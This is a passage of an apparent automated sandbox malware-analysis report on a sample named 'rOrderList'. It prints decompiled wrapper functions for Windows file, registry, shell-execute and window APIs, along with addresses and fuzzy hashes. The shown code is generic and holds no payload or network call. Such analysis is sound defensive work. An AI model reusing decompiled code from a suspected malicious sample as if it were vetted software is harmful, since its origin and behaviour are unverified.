                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: Create
                                                                                      • String ID:
                                                                                      • API String ID: 2289755597-0
                                                                                      • Opcode ID: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                                                      • Instruction ID: a37d777e965e9699b0e23720f5de0982c89539c866ab1c77fb99c91eca42481e
                                                                                      • Opcode Fuzzy Hash: 33f0ef72135594440bd39ae1090de480165a05d63dfabbbeebd316e266d8c237
                                                                                      • Instruction Fuzzy Hash: B2E0E672010109BFEF195F50ED0ADBB371DE704340F11452EFD07D4051E6B5A930A674
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004060E4(void* _a4, void* _a8, long _a12) {
                                                                                      				int _t7;
                                                                                      				long _t11;
                                                                                      
                                                                                      				_t11 = _a12;
                                                                                      				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                      				if(_t7 == 0 || _t11 != _a12) {
                                                                                      					return 0;
                                                                                      				} else {
                                                                                      					return 1;
                                                                                      				}
                                                                                      			}





                                                                                      0x004060e8
                                                                                      0x004060f8
                                                                                      0x00406100
                                                                                      0x00000000
                                                                                      0x00406107
                                                                                      0x00000000
                                                                                      0x00406109

                                                                                      APIs
                                                                                      • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040D47E,0040CEF0,00403511,0040CEF0,0040D47E,00414EF0,00004000,?,00000000,0040333B,00000004), ref: 004060F8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3934441357-0
                                                                                      • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                      • Instruction ID: 6979515bda9704ff85578e0c0429e47610ce6c1510064802d49ef9c1332cb9e6
                                                                                      • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                      • Instruction Fuzzy Hash: E3E08C3221022AABEF109E618C04AEB7B6CEB01360F014832FE16E7040D271E9308BE8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004060B5(void* _a4, void* _a8, long _a12) {
                                                                                      				int _t7;
                                                                                      				long _t11;
                                                                                      
                                                                                      				_t11 = _a12;
                                                                                      				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                      				if(_t7 == 0 || _t11 != _a12) {
                                                                                      					return 0;
                                                                                      				} else {
                                                                                      					return 1;
                                                                                      				}
                                                                                      			}





                                                                                      0x004060b9
                                                                                      0x004060c9
                                                                                      0x004060d1
                                                                                      0x00000000
                                                                                      0x004060d8
                                                                                      0x00000000
                                                                                      0x004060da

                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,0040358D,0040A230,0040A230,00403491,00414EF0,00004000,?,00000000,0040333B), ref: 004060C9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID:
                                                                                      • API String ID: 2738559852-0
                                                                                      • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                      • Instruction ID: 6a9dac85b633d085c252a5e98b17eff4fa9db91ceb9277f9f5c2807d74357857
                                                                                      • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                      • Instruction Fuzzy Hash: DCE0E63215026AABDF109E559C04AEB775CEF05751F014836F916E6190D631E93197A4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004023EC(short __ebx) {
                                                                                      				short _t7;
                                                                                      				WCHAR* _t8;
                                                                                      				WCHAR* _t17;
                                                                                      				void* _t21;
                                                                                      				void* _t24;
                                                                                      
                                                                                      				_t7 =  *0x40a010; // 0xa
                                                                                      				 *(_t21 + 8) = _t7;
                                                                                      				_t8 = E00402D3E(1);
                                                                                      				 *(_t21 - 0x10) = E00402D3E(0x12);
                                                                                      				GetPrivateProfileStringW(_t8,  *(_t21 - 0x10), _t21 + 8, _t17, 0x3ff, E00402D3E(0xffffffdd)); // executed
                                                                                      				_t24 =  *_t17 - 0xa;
                                                                                      				if(_t24 == 0) {
                                                                                      					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                                      					 *_t17 = __ebx;
                                                                                      				}
                                                                                      				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t21 - 4));
                                                                                      				return 0;
                                                                                      			}








                                                                                      0x004023ec
                                                                                      0x004023f3
                                                                                      0x004023f6
                                                                                      0x00402406
                                                                                      0x0040241d
                                                                                      0x00402423
                                                                                      0x00401751
                                                                                      0x004028f3
                                                                                      0x004028fa
                                                                                      0x004028fa
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040241D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileString
                                                                                      • String ID:
                                                                                      • API String ID: 1096422788-0
                                                                                      • Opcode ID: f55628d4b7fc1c3702899dee1337003f381c7036a296fbc4314416ebe8ce5134
                                                                                      • Instruction ID: 84a3be15b77accaad8f92e5f77cb7225a0a8ac318d6267ea73d07213f2db240d
                                                                                      • Opcode Fuzzy Hash: f55628d4b7fc1c3702899dee1337003f381c7036a296fbc4314416ebe8ce5134
                                                                                      • Instruction Fuzzy Hash: D3E04F30800219AADB00AFA0CE09EAE3769BF00300F10093AF520BB0D1E7FC89409749
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004063A9(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                                      				void* _t7;
                                                                                      				long _t8;
                                                                                      				void* _t9;
                                                                                      
                                                                                      				_t7 = E0040632E(_a4,  &_a12);
                                                                                      				if(_t7 != 0) {
                                                                                      					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
                                                                                      					return _t8;
                                                                                      				}
                                                                                      				_t9 = 6;
                                                                                      				return _t9;
                                                                                      			}






                                                                                      0x004063b3
                                                                                      0x004063ba
                                                                                      0x004063cd
                                                                                      0x00000000
                                                                                      0x004063cd
                                                                                      0x004063be
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406437,?,00000000,?,?,: Completed,?), ref: 004063CD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID:
                                                                                      • API String ID: 71445658-0
                                                                                      • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                                      • Instruction ID: b93d09ea675ceb766083aeed6388771540e4ed4a45e177d9f546af7c41f1e6d1
                                                                                      • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                                      • Instruction Fuzzy Hash: 2CD0123200020EBBDF115F91FD01FAB3B1DAB08710F014426FE06E4091D775D930A765
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004015A3() {
                                                                                      				int _t5;
                                                                                      				void* _t11;
                                                                                      				int _t14;
                                                                                      
                                                                                      				_t5 = SetFileAttributesW(E00402D3E(0xfffffff0),  *(_t11 - 0x2c)); // executed
                                                                                      				_t14 = _t5;
                                                                                      				if(_t14 == 0) {
                                                                                      					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                                                      				}
                                                                                      				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t11 - 4));
                                                                                      				return 0;
                                                                                      			}






                                                                                      0x004015ae
                                                                                      0x004015b4
                                                                                      0x004015b6
                                                                                      0x00402925
                                                                                      0x00402925
                                                                                      0x00402bc5
                                                                                      0x00402bd1

                                                                                      APIs
                                                                                      • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: 1068ee9ff51518d7ae881db133f281e6a135391a32e288d1beccd5de33e40109
                                                                                      • Instruction ID: 319356c04533e9289a6ed1861cb0ef80ae0b3bb3c13a9342652098b8c4421f6d
                                                                                      • Opcode Fuzzy Hash: 1068ee9ff51518d7ae881db133f281e6a135391a32e288d1beccd5de33e40109
                                                                                      • Instruction Fuzzy Hash: 60D01772B042049BCB00DFA9AA48A9E73B0EF24328B308537D521F21D0D6B889519A2A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004044DE(int _a4) {
                                                                                      				struct HWND__* _t2;
                                                                                      				long _t3;
                                                                                      
                                                                                      				_t2 =  *0x429238;
                                                                                      				if(_t2 != 0) {
                                                                                      					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                                                                                      					return _t3;
                                                                                      				}
                                                                                      				return _t2;
                                                                                      			}





                                                                                      0x004044de
                                                                                      0x004044e5
                                                                                      0x004044f0
                                                                                      0x00000000
                                                                                      0x004044f0
                                                                                      0x004044f6

                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: 8557fc69485774ba4641c6a2d2b4437b1a5152abf7221d5f63999a85994ee7b6
                                                                                      • Instruction ID: 113db2c9408c8cca4cfcb58c80206ddc2c6448e789c7211f53b93fac71a9565f
                                                                                      • Opcode Fuzzy Hash: 8557fc69485774ba4641c6a2d2b4437b1a5152abf7221d5f63999a85994ee7b6
                                                                                      • Instruction Fuzzy Hash: 1FC04C71740601BADA208B509E45F0777546750740F158469B741A50E0CA74E411D62D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00405B68(struct _SHELLEXECUTEINFOW* _a4) {
                                                                                      				struct _SHELLEXECUTEINFOW* _t4;
                                                                                      				int _t5;
                                                                                      
                                                                                      				_t4 = _a4;
                                                                                      				_t4->lpIDList = _t4->lpIDList & 0x00000000;
                                                                                      				_t4->cbSize = 0x3c; // executed
                                                                                      				_t5 = ShellExecuteExW(_t4); // executed
                                                                                      				return _t5;
                                                                                      			}





                                                                                      0x00405b68
                                                                                      0x00405b6d
                                                                                      0x00405b71
                                                                                      0x00405b77
                                                                                      0x00405b7d

                                                                                      APIs
                                                                                      • ShellExecuteExW.SHELL32(?), ref: 00405B77
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExecuteShell
                                                                                      • String ID:
                                                                                      • API String ID: 587946157-0
                                                                                      • Opcode ID: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                                                                      • Instruction ID: 155326c85e208380d9db810c36285a9e1b4200be200639c8195ffcf147e959ee
                                                                                      • Opcode Fuzzy Hash: 34af207f7f04f37b2a6a243a8c8041682423b78b35e6f682d2e1a111f695392f
                                                                                      • Instruction Fuzzy Hash: BEC092B2000200EFE301CF80CB09F067BE8AF54306F028068E185DA060C7788840CB29
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004044C7(int _a4) {
                                                                                      				long _t2;
                                                                                      
                                                                                      				_t2 = SendMessageW( *0x42a268, 0x28, _a4, 1); // executed
                                                                                      				return _t2;
                                                                                      			}




                                                                                      0x004044d5
                                                                                      0x004044db

                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000028,?,00000001,004042F2), ref: 004044D5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
                                                                                      • Instruction ID: 26063d6d883ff380d2e1d7f9fe2b9d631bf033e6200e0a233fd0d302f8c02db7
                                                                                      • Opcode Fuzzy Hash: 70666cfd2db8a5712e0e3ed728d50a5e19955e25533eceda6abdc0f56bdf790a
                                                                                      • Instruction Fuzzy Hash: 5BB01235286A00FBDE614B00DE09F457E62F764B01F048078F741240F0CAB300B5DF19
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00403590(long _a4) {
                                                                                      				long _t2;
                                                                                      
                                                                                      				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                                      				return _t2;
                                                                                      			}




                                                                                      0x0040359e
                                                                                      0x004035a4

                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040328E,?), ref: 0040359E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 973152223-0
                                                                                      • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                      • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                      • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                      • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E004044B4(int _a4) {
                                                                                      				int _t2;
                                                                                      
                                                                                      				_t2 = EnableWindow( *0x423744, _a4); // executed
                                                                                      				return _t2;
                                                                                      			}




                                                                                      0x004044be
                                                                                      0x004044c4

                                                                                      APIs
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,0040428B), ref: 004044BE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
